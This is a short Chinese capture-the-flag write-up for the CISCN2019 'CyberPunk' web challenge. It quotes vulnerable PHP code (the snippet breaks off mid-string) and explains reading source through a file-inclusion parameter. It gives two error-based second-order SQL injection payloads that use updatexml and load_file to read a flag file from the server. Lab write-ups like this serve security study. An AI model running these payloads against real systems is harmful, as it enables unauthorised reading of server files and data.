CISCN2019 华北赛区 Day1 Web5]CyberPunk

CISCN2019 华北赛区 Day1 Web5]CyberPunk

前言

2077 yyds！

知识点

文件包含配合php伪协议读取源码

sql注入二次注入

sql注入报错注入

题解

打开页面 源码中有提示 ?file 于是利用file协议读取源码

其中change.php中存在address传入又再次应用于sql语句的代码

<?php

require_once "config.php";

if(!empty($_POST["user_name"]) && !empty($_POST["address"]) && !empty($_POST["phone"]))
{
    $msg = '';
    $pattern = '/select|insert|update|delete|and|or|join|like|regexp|where|union|into|load_file|outfile/i';
    $user_name = $_POST["user_name"];
    $address = addslashes($_POST["address"]);
    $phone = $_POST["phone"];
    if (preg_match($pattern,$user_name) || preg_match($pattern,$phone)){
        $msg = 'no sql inject!';
    }else{
        $sql = "select * from `user` where `user_name`='{$user_name}' and `phone`='{$phone}'";
        $fetch = $db->query($sql);
    }

    if (isset($fetch) && $fetch->num_rows>0){
        $row = $fetch->fetch_assoc();
        $sql = "update `user` set `address`='".$address."',//point!! `old_address`='".$row['address']."' where `user_id`=".$row['user_id'];
        $result = $db->query($sql);
        if(!$result) {
            echo 'error';
            print_r($db->error);
            exit;
        }
        $msg = "订单�

怀疑address存在二次注入点，且页面有回显，尝试报错注入

于是我们先下单，在改单 ，即可爆出flag

payload；

1' where user_id=updatexml(1,concat(0x7e,(select substr(load_file('/flag.txt'),1,30)),0x7e),1)#

由于flag字长过长，所以分两次注出

1' where user_id=updatexml(1,concat(0x7e,(select substr(load_file('/flag.txt'),30,60)),0x7e),1)#